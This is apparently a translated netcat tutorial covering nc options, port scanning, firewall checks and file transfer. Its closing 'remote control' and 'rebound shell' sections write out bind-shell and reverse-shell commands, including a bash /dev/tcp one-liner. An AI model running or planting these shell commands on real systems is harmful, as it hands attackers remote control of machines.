nc is the swiss army knife of networking tools
nc command full name netcat, used for data flow operations of TCP, UDP or unix domain sockets (uds). It can open TCP connections, send UDP packets, and listen to any TCP and UDP ports, and can also be used for port scanning, supporting IPv4 and IPv6. The difference from Telnet is that nc can write scripts.
nc [-hlnruz][-g<gateway...>][-G<number of pointers>][-i<delay seconds>][-o<output file>][-p<communication port>]
[-s<source address>][-v...][-w<timeout seconds>][host name][communication port...]
-4 Only use IPv4
-6 only uses IPv6
-c Use tls to connect or listen
-D enables socket debugging switch
-g <gateway> #Set router jump communication gateways, up to 8 can be set.
-G<number of pointers> # Set the source routing pointer, its value is a multiple of 4.
-h online help.
-i<delay seconds> Set the time interval for sending information and scanning communication ports.
-l Use listening mode to control incoming data.
-n uses the IP address directly without going through the domain name server.
-o<Output file> #Specify the file name, and dump the transmitted data in hexadecimal characters into this file and save it.
-p<communication port> #Set the communication port used by the local host.
-r random number specifies the communication port between the local and remote hosts.
-s<source address> # Set the IP address of the local host to send data packets.
-u Use UDP transport protocol.
-v displays the instruction execution process.
-w<timeout seconds> #Set the time to wait for connection.
-z Use 0 input/output mode, only used when scanning communication ports.
TCP Port Scanning
[root@localhost ~]# nc -v -z -w2 192.168.0.3 1-100
192.168.0.3: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.3] 80 (http) open
(UNKNOWN) [192.168.0.3] 23 (telnet) open
(UNKNOWN) [192.168.0.3] 22 (ssh) open
Scan the port of 192.168.0.3. The range is 1-100 Scan UDP ports
[root@localhost ~]# nc -u -z -w2 192.168.0.3 1-1000 # Scan the port of 192.168.0.3. The range is 1-1000
Scan specified port
[root@localhost ~]# nc -nvv 192.168.0.1 80 # Scan port 80
(UNKNOWN) [192.168.0.1] 80 (?) open
y //user input
Check whether outbound port 443 from the server to the destination is blocked by the firewall
nc -vz acme-v02.api.letsencrypt.org 443 -w2
# Ncat: Version 7.50 (https://nmap.org/ncat)
# Ncat: Connected to 23.77.214.183:443.
# Ncat: 0 bytes sent, 0 bytes received in 0.07 seconds.
file transfer
# The receiver sets the listening port and the file name to be received in advance (the file name can be customized):
nc -lp 8888 > node.tar.gz
# Transferring party sends files:
nc -nv 192.168.75.121 8888 < node_exporter-1.3.1.linux-amd64.tar.gz
# ⚠️ Note: 192.168.75.121 is the IP address of the recipient.
# If you want to exit automatically after the file transfer is completed, you can use the following command:
nc -lp 8888 > node.tar.gz
nc -nv 192.168.75.121 8888 -i 1 < node_exporter-1.3.1.linux-amd64.tar.gz
# ⚠️ Note: -i means idle timeout
remote control
# Forward control, the controlled terminal actively sets the listening port and bash environment, and the control terminal connects. If there is a firewall, the port needs to be opened, otherwise it will be intercepted.
# The controlled terminal executes the following command:
nc -lvnp 8888 -c bash
# Execute the following command on the control terminal:
nc 192.168.75.121 8888
# Reverse control, the control end sets a listening port, the controlled end actively connects to the control end's IP and port, and provides a bash environment.
# Execute the following command on the control terminal:
nc -lvnp 8888
# The controlled terminal executes the following command:
nc 192.168.75.121 8888 -c bash
rebound shell
# Execute the following command on the control terminal:
nc -lvnp 8888
# The controlled terminal executes the following command:
bash -i &> /dev/tcp/192.168.75.121/8888 0>&1